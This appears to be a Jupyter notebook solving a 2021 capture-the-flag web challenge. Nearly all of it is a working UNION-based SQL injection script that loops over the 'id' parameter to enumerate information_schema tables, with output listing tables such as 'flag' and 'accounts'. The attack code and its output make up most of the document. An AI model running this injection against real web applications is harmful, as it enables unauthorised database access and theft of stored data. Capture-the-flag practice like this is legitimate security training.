In [67]:
import requests
import re
import urllib
import pandas as pd

In [45]:
payload = "100 UNION SELECT 100,table_name,TABLE_TYPE FROM information_schema.tables LIMIT _,1"
base = "http://quotedb-web.2021.ctfcompetition.com"

In [64]:
res = dict()

for i in range(500):

    params = {"id":f"100 UNION SELECT 100,table_name,TABLE_TYPE FROM information_schema.tables LIMIT {i},1"}

    req = session.get(
        url=base,
        params=params
    )
    
    try:
        res[i] = re.search("""<p class=\'quote\'>\n    "(.*)" - (.*) <""",req.text).groups(0)
    except:
        break

In [96]:
df = pd.DataFrame(res).transpose()
df

                             0             1
0                  ALL_PLUGINS  SYSTEM VIEW
1             APPLICABLE_ROLES  SYSTEM VIEW
2               CHARACTER_SETS  SYSTEM VIEW
3            CHECK_CONSTRAINTS  SYSTEM VIEW
4                   COLLATIONS  SYSTEM VIEW
..                         ...           ...
289                index_stats   BASE TABLE
290         innodb_table_stats   BASE TABLE
291                       proc   BASE TABLE
292  time_zone_transition_type   BASE TABLE
293                      event   BASE TABLE

[294 rows x 2 columns]

In [106]:
df = df.rename({0:"name",1:"type"},axis=1)
df = df.apply(lambda x:x.str.strip())

In [107]:
df = df[df.type == "BASE TABLE"]

In [108]:
df

                          name        type
96                  sys_config  BASE TABLE
180                       flag  BASE TABLE
181                     quotes  BASE TABLE
182                   accounts  BASE TABLE
183             cond_instances  BASE TABLE
..                         ...         ...
289                index_stats  BASE TABLE
290         innodb_table_stats  BASE TABLE
291                       proc  BASE TABLE
292  time_zone_transition_type  BASE TABLE
293                      event  BASE TABLE

[114 rows x 2 columns]